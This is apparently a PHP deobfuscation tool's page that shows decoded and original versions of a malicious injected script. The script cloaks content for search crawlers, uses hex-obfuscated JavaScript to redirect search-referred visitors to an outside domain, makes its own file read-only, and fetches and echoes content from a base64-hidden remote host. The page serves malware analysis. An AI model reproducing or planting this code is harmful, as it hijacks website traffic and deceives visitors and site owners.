Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

->|<?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGEN..

Decoded Output download

->|<?php 
header('Content-Type:text/html;charset=gb2312'); 
$key= $_SERVER["HTTP_USER_AGENT"]; 
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false) 
{ 
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; 
   $file =  
 
   echo $file; 
} 
 
?> 
<script LANGUAGE="Javascript"> 
var JdsilflN_1=window["document"]["referrer"] 
if(JdsilflN_1["indexOf"]("google")>0 || JdsilflN_1["indexOf"]("baidu")>0 || JdsilflN_1["indexOf"]("sogou")>0 ) location["href"]="http://um8868.com/"; 
</script><?php 
set_time_limit(0); 
$url1 = $_SERVER['PHP_SELF'];   
$name= substr($url1 ,strrpos($url1 ,'/')+1 ); 
@chmod($name,0444); 
header("Content-Type: text/html;charset=gb2312"); 
date_default_timezone_set('PRC'); 
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ=="); 
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; 
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
echo $c; 
?>|<- 
0 

Did this file decode correctly?

Original Code

->|<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = 

   echo $file;
}

?>
<script LANGUAGE="Javascript">
var JdsilflN_1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if(JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75")>0 ) location["\x68\x72\x65\x66"]="\x68\x74\x74\x70\x3a\x2f\x2f\x75\x6d\x38\x38\x36\x38\x2e\x63\x6f\x6d\x2f";
</script><?php
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF'];  
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
@chmod($name,0444);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ==");
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $c;
?>|<-
0

Function Calls

None

Variables

None

Stats

MD5 8dbac3eae591a252263e1681f44e543b
Eval Count 0
Decode Time 84 ms